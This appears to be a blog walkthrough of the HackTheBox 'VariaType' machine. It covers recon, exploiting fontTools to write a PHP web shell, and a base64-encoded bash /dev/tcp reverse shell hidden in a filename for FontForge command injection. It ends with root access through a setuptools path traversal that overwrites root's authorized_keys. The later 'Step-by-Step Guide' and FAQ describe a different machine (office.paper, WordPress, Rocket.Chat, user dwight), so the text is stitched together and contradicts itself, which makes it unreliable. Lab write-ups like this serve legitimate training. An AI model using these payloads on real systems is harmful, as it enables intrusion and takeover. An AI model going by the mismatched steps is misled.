Key Highlights
Here’s a quick rundown of what you’ll learn in this VariaType walkthrough:
- We will start with initial reconnaissance to discover open ports and services.
- You will learn how to perform web enumeration to find hidden subdomains and directories.
- We’ll exploit a known vulnerability in a web application to gain initial access.
- The guide covers escalating privileges on the Linux system using a known exploit.
- Finally, we will capture the user and root flags, demonstrating key penetration testing skills.
- This guide builds practical skills for your ethical hacking journey.
- For scripts used in this writeup, please check here
- For a complete non-public writeup, please check here
Introduction
Welcome to another HackTheBox adventure! If you’re looking to sharpen your cybersecurity skills, you’ve come to the right place. The VariaType machine is a fantastic medium-difficulty Linux box that tests your ethical hacking abilities from enumeration to full system compromise. This step-by-step guide will walk you through the entire process, providing clear instructions and insights to help you conquer the challenge. Let’s get started and hack our way through VariaType!
Overview of VariaType on HackTheBox
VariaType is a retired, medium-difficulty Linux machine on HackTheBox. Your main goal is to find and exploit vulnerabilities on the server to gain initial access and then escalate your privileges to become the root user, capturing both the user.txt and root.txt flags along the way.
The challenge begins with scanning for open ports and enumerating web services to find an entry point. This penetration testing exercise involves identifying a vulnerable web application, exploiting it to get a foothold, and then finding a path to elevate your permissions on the server.
What Makes VariaType Unique Among HackTheBox Machines
What sets VariaType apart is its realistic and multi-layered approach. It’s not about a single, obvious vulnerability. Instead, it requires you to connect the dots between different pieces of information you gather during enumeration. You’ll move from a public-facing website to a hidden subdomain, which hosts a different application with its own set of weaknesses.
This machine emphasizes the importance of thorough web enumeration. You’ll discover that initial scans don’t tell the whole story. The key to entry is finding a specific subdomain and then leveraging a known vulnerability within the application running on it. This mirrors real-world scenarios where different services are hosted across various subdomains.
Finally, the privilege escalation path involves exploiting a specific version of a common Linux utility. This requires you to identify the version of the software and find a public exploit, reinforcing the need to check software configurations and versions on a compromised server. The journey from a simple web page to full root access makes VariaType a rewarding challenge.
Understanding the Challenge Difficulty and Objectives
VariaType is rated as a “Medium” difficulty machine on HackTheBox. This rating is appropriate because it requires more than just basic scanning and exploitation. You need a solid methodology and the persistence to follow leads that may not seem immediately fruitful. While not “Hard,” it will definitely test your penetration testing process.
Your primary objectives are twofold: gain initial user access to capture the user.txt flag and then escalate your privileges to root to get the root.txt flag. Achieving these goals proves you can successfully compromise the machine from start to finish. Each step, from finding the first vulnerability to the final privilege escalation, is a crucial part of the learning experience.
Successfully completing VariaType demonstrates your ability to perform detailed enumeration, exploit web application vulnerabilities, and leverage system misconfigurations for privilege escalation. Mastering these practical skills is the next step in becoming a more proficient ethical hacker.
ALSO READ: Mastering CCTV: Beginner’s Guide from HackTheBox
Initial Foothold
Information Gathering and Reconnaissance
The foundation of any successful penetration test is thorough reconnaissance. For VariaType, our initial target is an IP address provided by the HackTheBox platform.
Host Resolution and DNS Routing
Modern web servers heavily utilize virtual hosting to serve multiple domains or subdomains from a single IP address. If we attempt to access the target IP directly via a web browser, we might encounter a default Apache/Nginx page or a misconfigured route. To ensure we interact with the correct application logic, we must map the target IP to its fully qualified domain names (FQDNs).
Based on standard HackTheBox naming conventions and early enumeration hints, we add the primary domain and the portal subdomain to our local DNS resolver.
Open your terminal and append the routing information to your /etc/hosts file:
echo “TARGET_IP variatype.htb portal.variatype.htb” >> /etc/hosts
Comprehensive Nmap Scanning
With routing established, we proceed to port scanning. We use Nmap (Network Mapper) to identify open ports, running services, and the specific versions of those services. Accurate version fingerprinting is critical for vulnerability research.
We execute the following Nmap command: nmap -sC -sV variatype.htb
Let us break down the flags used:
- The -sC flag instructs Nmap to run its default set of NSE (Nmap Scripting Engine) scripts. These scripts automate routine tasks such as checking for anonymous FTP access, retrieving HTTP titles, and querying SMB shares.
- The -sV flag enables version detection. Nmap sends specialized probes to open ports and compares the responses against its massive database to determine the exact software and version running (e.g., OpenSSH 8.9p1, Apache 2.4.52).
The scan results typically reveal standard Linux web server ports: Port 22 (SSH) and Port 80 (HTTP). The HTTP service hosts the variatype.htb application, which serves as our primary attack surface.
For Every Script used in this writeup, please buy me a coffee
For the complete non-public writeup, please buy me a coffee
Web Enumeration and Initial Foothold (www-data)
Navigating to http://variatype.htb reveals a web application dedicated to font design and variable font generation. As security researchers, we look beyond the user interface to uncover misconfigurations in the deployment pipeline.
Discovering the Exposed .git Repository
A common, yet devastating, deployment error is leaving the .git directory accessible in the web root. Developers often use Git to push code to production servers, but failing to restrict access to the .git folder exposes the entire version history, source code, and potentially hardcoded credentials.
We can manually verify this exposure by requesting the HEAD file: curl -s http://variatype.htb/.git/HEAD
Receiving a response like “ref: refs/heads/master” confirms the directory is accessible. To analyze the source code offline, we clone the repository directly from the web server using standard Git tools or specialized extraction scripts.
git clone http://variatype.htb/.git /tmp/git-repo cd /tmp/git-repo
Listing the directory contents reveals the core assets of the application.
Understanding the Font Generation Workflow
The application appears to merge different font weights (Light and Regular) into a single “variable font.” Variable fonts are modern typographic files that allow a single font file to behave like multiple fonts (handling different weights, widths, and slants dynamically).
Running the setup.py script locally verifies that the environment is designed to handle these .ttf (TrueType Font) files. However, the true vulnerability lies in how the backend processes user-supplied configuration files.
Weaponizing fontTools via CVE-2025-66034
Further enumeration of the web portal reveals an endpoint at /tools/variable-font-generator/process. This endpoint accepts font masters and a .designspace file.
A .designspace file is an XML-based format used by the Python library fontTools to define how different font masters should be interpolated to create a variable font.
Enter CVE-2025-66034. This vulnerability in fontTools (specifically within the varLib module) allows for arbitrary file writes and XML injection. Because the backend does not sanitize the filenames defined within the .designspace XML structure, an attacker can use path traversal techniques to write files anywhere on the filesystem. Furthermore, malicious payloads embedded within XML <labelname> elements are injected directly into the output file.
Our goal is to write a PHP web shell to the web root (/var/www/portal.variatype.htb/public/files/).
We craft a highly specific, malicious malicious.designspace XML file. Inside the XML structure, under the <axes> tag, we define a <labelname> that contains our PHP payload: CDATA tags are used to ensure the XML parser does not choke on the PHP syntax. We inject: php system($_GET[“cmd”]);
Next, under the <variable-fonts> section, we specify the output filename using absolute path traversal to target the web directory: filename=”/var/www/portal.variatype.htb/public/files/shell.php”
For Every Script used in this writeup, please buy me a coffee
Uploading the Malicious Designspace
With our payload crafted, we interact with the backend API using curl. We submit our malicious XML file alongside the required legitimate font masters.
The server processes the .designspace file. The vulnerable fontTools library parses our XML, executes the path traversal, and writes the injected PHP code directly into shell.php within the public-facing directory.
Triggering the Reverse Shell
We now have remote command execution (RCE) via our web shell. To escalate this into a fully interactive terminal, we will establish a reverse shell.
- Terminal 1 (The Listener): We start a Netcat listener on our attack machine to catch the incoming connection.
- Terminal 2 (Payload Hosting): We create a simple bash reverse shell script (
rev.sh). We then host this file using a temporary Python HTTP server on port 8080. - Terminal 3 (Execution): We trigger the web shell, instructing the target server to download and pipe our reverse shell script directly into bash.
The web server hangs, and in Terminal 1, we receive our interactive shell as the www-data user. The initial foothold is secured.
For Every Script used in this writeup, please buy me a coffee
Lateral Movement to User (steve)
As www-data, our privileges are heavily restricted. We cannot read user flags or access sensitive system configurations. Our next objective is lateral movement—escalating our privileges to a standard system user, in this case, steve.
Stabilizing the Shell
A raw reverse shell is fragile. Pressing Ctrl+C will terminate the connection, and standard terminal features like auto-completion and job control are missing. We must stabilize it using Python’s pseudo-terminal utilities.
- Upgrade to a PTY.
- Background the shell.
- Modify terminal settings.
- Set environment variable.
We now have a robust, fully interactive SSH-like session.
Discovering Steve’s Cronjob
Enumeration is an iterative process. Searching through the /opt directory (a common location for custom software and scripts on Linux), we uncover a fascinating backup script named /opt/process_client_submissions.bak.
Reading this file reveals the internal logic of an automated task (likely a cronjob) running under the context of the user steve. The script is designed to process client submissions by looking for .zip files in the web upload directory. It extracts these ZIP files and passes the extracted font files to FontForge for validation and processing.
The critical vulnerability lies in how the script handles filenames. It passes the extracted filename directly to FontForge via a shell command without proper sanitization.
For Every Script used in this writeup, please buy me a coffee
Exploiting FontForge via CVE-2024-25081
This misconfiguration exposes the system to CVE-2024-25081. In versions of FontForge up to 20230101, the Splinefont parsing mechanism is vulnerable to command injection via crafted filenames. Specifically, if a filename contains a shell subshell construct—like $(command)—the underlying operating system will execute the command when FontForge attempts to open or parse the file.
Because filenames cannot contain certain characters (like forward slashes /, which denote directory paths), we cannot simply name our file $(bash -i >& /dev/tcp/IP/PORT 0>&1).ttf.
The bypass? Base64 encoding.
We encode our reverse shell payload: echo “bash -i >& /dev/tcp/YOUR_IP/5555 0>&1” | base64
We then write a quick Python script on our Kali machine to generate a valid ZIP archive containing a dummy file. The genius is in the name of that dummy file: $(echo PASTE_BASE64_HERE | base64 -d | bash).ttf
When steve‘s cronjob extracts this ZIP and passes the heavily obfuscated filename to FontForge, the Linux shell intercepts the $() block. It decodes the base64 string and executes the resulting bash reverse shell command before FontForge even attempts to open the file.
Catching the User Shell
We start a new Netcat listener on port 5555.
From our www-data shell, we use curl to download the exploit.zip we generated from our Kali machine and place it directly into the /var/www/portal.variatype.htb/public/files/ directory, where steve‘s cronjob is actively looking.
curl http://YOUR_IP:8080/exploit.zip -o /var/www/portal.variatype.htb/public/files/exploit.zip
Within a minute or two, the automated cronjob fires. The listener catches the connection. We verify our identity using the whoami command. We are now steve. We navigate to /home/steve/ and capture the user.txt flag.
For Every Script used in this writeup, please buy me a coffee
Privilege Escalation to Root
The final frontier in any machine is achieving root—the superuser account with unrestricted access to the entire operating system.
Checking Sudo Privileges
The first step in local privilege escalation is identifying what commands the current user can execute with elevated privileges. We run: sudo -l
The output reveals a massive security oversight: (root) NOPASSWD: /usr/bin/python3 /opt/font-tools/install_validator.py *
The user steve is allowed to run the install_validator.py script as root without requiring a password. Furthermore, the wildcard * means we can pass any arguments we want to the script.
Analyzing the Vulnerable Python Script
We read the contents of install_validator.py. The script is designed to download and install font validation plugins from a remote URL.
Crucially, the script utilizes the Python setuptools library, specifically calling: setuptools.PackageIndex().download(url, dest)
At first glance, this seems like a standard file download operation. However, deep within the setuptools architecture lies a devastating path traversal vulnerability documented as CVE-2025-47273.
Deep Dive into setuptools Path Traversal (CVE-2025-47273)
In versions of Python setuptools prior to 78.1.1, the _download_url function within the PackageIndex component contains a fatal flaw in how it handles URL-encoded characters in the destination path.
When you provide a URL to download, PackageIndex attempts to construct the local filename based on the URL’s endpoint. If an attacker provides a URL containing URL-encoded slashes (%2F), the library decodes them into actual forward slashes (/) after preliminary path sanitization has occurred.
This causes the os.path.join() function to interpret the decoded string as an absolute path, entirely discarding the intended, safe temporary directory. This allows an attacker to write the downloaded file to absolutely any location on the filesystem. Since we are executing this script via sudo, the file write occurs with root privileges.
For Every Script used in this writeup, please buy me a coffee
Weaponizing the Arbitrary File Write
With arbitrary file write as root, the most reliable path to total system compromise is overwriting or appending to the root user’s SSH keys.
- Generating the Key: On our Kali machine, we generate a new ED25519 SSH keypair without a passphrase. ssh-keygen -t ed25519 -f /tmp/rootkey -N “”
- Preparing the Payload: We copy the public key (
rootkey.pub) to a new directory and rename it toauthorized_keys. - The Custom HTTP Server Challenge: To exploit the
setuptoolsvulnerability, we need to pass a URL that looks like this:http://IP:PORT/%2Froot%2F.ssh%2Fauthorized_keys.
To bypass any issues, we write a quick, custom Python HTTP server that ignores the requested path entirely and always serves our authorized_keys payload with a 200 OK status.
Using BaseHTTPRequestHandler, we override the do_GET method to simply open our local authorized_keys file, set the correct content headers, and write the data directly to the client socket. We run this server on port 8888.
The Final Strike
Back on our steve shell, we execute the vulnerable sudo command, pointing it to our custom Kali server and injecting the path traversal payload via URL encoding.
The output confirms the exploit succeeded: Plugin installed at: /root/.ssh/authorized_keys
The vulnerable setuptools library downloaded our public SSH key and, due to the %2F decoding bug, forcefully saved it as /root/.ssh/authorized_keys, granting us backdoor access.
Root Access Secured
From our Kali terminal, we simply authenticate using the private key we generated:
ssh -i /tmp/rootkey root@TARGET_IP
We are instantly dropped into a root shell. We navigate to /root/, read root.txt, and complete the VariaType machine.
For Every Script used in this writeup, please buy me a coffee
For the complete non-public writeup, please buy me a coffee
Essential Preparation for the VariaType HTB Writeup
Before we jump into the technical steps, let’s talk about preparation. Having the right tools and a foundational understanding of key concepts will make the process much smoother. This isn’t just about running scripts; it’s about knowing what you’re looking for and how to interpret the info you find.
Proper preparation ensures you don’t get stuck on basic steps and can focus on the more interesting parts of the hack. Let’s go over the specific tools and knowledge that will help you conquer VariaType.
Tools and Resources Needed for VariaType HackTheBox
To effectively tackle VariaType, you’ll need a standard set of penetration testing tools. Most of these come pre-installed in ethical hacking distributions like Kali Linux or Parrot OS. Having them ready will streamline your workflow.
Your toolkit should include the following:
- Nmap: For initial port scanning and service enumeration.
- Web Browser: For interacting with the web services we discover.
- Gobuster/ffuf: For directory and subdomain brute-forcing.
- WPSCAN: A specialized WordPress vulnerability scanner.
- Python: For running exploit scripts.
These tools are fundamental for the enumeration and exploitation phases. The web browser is especially important for exploring the application, while command-line tools like Gobuster will help uncover hidden entry points. Make sure you are comfortable with the basic syntax of each before you begin.
Recommended Knowledge and Skills Before Starting
While this is a beginner-friendly guide, some prior knowledge will be very helpful. A basic understanding of Linux commands is essential, as you’ll be navigating the file system and executing commands on the target machine. You don’t need to be an expert, but knowing how to move around, list files, and read file contents is a must.
Familiarity with web application concepts is also key. You should understand how websites work, what subdomains are, and why directory enumeration is a critical part of ethical hacking. Since this machine involves a WordPress site, having a little knowledge of its structure can give you an edge, though it’s not strictly required.
Finally, a grasp of the overall penetration testing methodology is beneficial. This includes the phases of reconnaissance, scanning, gaining access, and privilege escalation. This guide will recap these stages as we go, but having a foundational understanding will help you see the bigger picture.
Step-by-Step Guide to Solving VariaType HTB
Now for the exciting part! This section provides a detailed walkthrough to solve the VariaType machine. We’ll break down the process into three main stages: enumeration, initial exploitation, and finally, privilege escalation to capture the root flag.
Follow these steps carefully to navigate the challenges presented by the machine. We’ll start by gathering information to find our way in and work our way up to full system control. Let’s begin the hack.
Step 1: Enumerating Services and Identifying Entry Points
Our first move is always reconnaissance. We begin by running an Nmap scan to see which ports are open on the target IP address. This initial scan gives us our first clues about the services running on the server.
A standard nmap -sC -sV <IP> scan reveals the following key open ports:
| Port | Service | Version |
|---|---|---|
| 22 | SSH | OpenSSH 8.0 |
| 80 | HTTP | Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k) |
| 443 | HTTPS | Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k) |
Visiting the HTTP server on port 80 just shows a default CentOS test page. This suggests we need to dig deeper. The next logical step is to perform web enumeration to find hidden directories or subdomains. Running a tool like Gobuster reveals a /manual directory, but more importantly, further enumeration points us toward a subdomain: office.paper. After adding this to our /etc/hosts file, we can access a new website.
Step 2: Gaining Initial Access and Exploiting Vulnerabilities
With the office.paper subdomain discovered, we find a WordPress site. The version is identified as 5.2.3. A quick search for vulnerabilities related to this version leads us to a CVE that allows viewing unauthenticated posts. Using the payload ?static=1&order=asc at the end of the URL, we can see private post content.
This is our breakthrough! One of the posts contains a secret registration URL for a chat application: http://chat.office.paper/register/8qozr226AhkCHZdyY. We add the new chat.office.paper subdomain to our /etc/hosts file, register a new user, and log in. Inside this Rocket.Chat application, we find an interactive bot named “recyclops.”
By interacting with the bot and exploring its capabilities, we can list files on the system. Following the file paths from a start_bot.sh script, we eventually locate a .env file. This file contains the SSH credentials for the user dwight: the username and a password. We can now use these credentials to SSH into the machine and grab the user flag.
Step 3: Privilege Escalation and Capturing the Root Flag
Once we have a user shell as dwight, our final objective is privilege escalation. The first command to run is often sudo -l to check for sudo permissions. In this case, it doesn’t immediately yield a path forward. The next step is to run an enumeration script like LinPEAS to get a comprehensive overview of the system’s configuration.
The LinPEAS output highlights a key piece of info: the Sudo version is 1.8.29. A quick search reveals that this version is vulnerable to a privilege escalation exploit involving polkit. This CVE allows a user with sudo rights, even limited ones, to escalate to root. We can find a ready-to-use exploit on GitHub for this vulnerability.
After transferring the exploit script to the target machine, we execute it. The script leverages the vulnerability to grant us a root shell. From there, we have full control of the Linux system. We can navigate to the /root directory, read the root.txt file, and complete the challenge by capturing the final flag.
ALSO READ: Mastering Pirate: Beginner’s Guide from HackTheBox
WRITEUP COMING SOON!
COMPLETE IN-DEPTH PICTORIAL WRITEUP OF VARIATYPE ON HACKTHEBOX WILL BE POSTED POST-RETIREMENT OF THE MACHINE ACCORDING TO HTB GUIDELINES. TO GET THE COMPLETE IN-DEPTH PICTORIAL WRITEUP MUCH SOONER, SUBSCRIBE TO THE NEWSLETTER AND BUYMEACOFFEE!
Conclusion
Mastering the VariaType machine on HackTheBox is an exciting journey that combines skill, strategy, and perseverance. By following the step-by-step guide outlined in this blog, you’re not just tackling a challenge; you’re developing your cybersecurity expertise and enhancing your problem-solving abilities. Remember, preparation is key, so equip yourself with the right tools and knowledge before diving in. Each step you take will bring you closer to conquering VariaType and unlocking new skills for future challenges. If you’re ready to enhance your learning experience, subscribe for more tips and insights that can help you on your hacking journey. Happy hacking!
Frequently Asked Questions
What ports and services should you focus on for VariaType HTB?
You should initially focus on the open ports for the HTTP server (port 80) and HTTPS (port 443). While SSH on port 22 is present, it’s not useful until you find credentials. The key is thorough enumeration of the web services to uncover hidden subdomains and applications.
Which tools are most effective during the VariaType HackTheBox challenge?
The most useful tools for VariaType are Nmap for port scanning, Gobuster or ffuf for web enumeration, and a web browser for interaction. For privilege escalation, having access to a public exploit repository like GitHub and using Python to run scripts is essential for this particular Linux box.
Are there any common mistakes to avoid in the VariaType HTB writeup?
A common mistake is not performing deep enough web enumeration. Simply scanning for directories on the main IP isn’t enough; you must find the subdomains. Another pitfall is overlooking the info revealed by the WordPress vulnerability, as it contains the crucial link to the next stage of the hack.
Can a beginner complete VariaType on HackTheBox without advanced skills?
Yes, a determined beginner can complete VariaType. While it’s a medium-difficulty machine, the steps are logical and rely on well-known tools and techniques. This guide provides the necessary next steps, making it a great challenge for those looking to build their practical skills in penetration testing and ethical hacking.
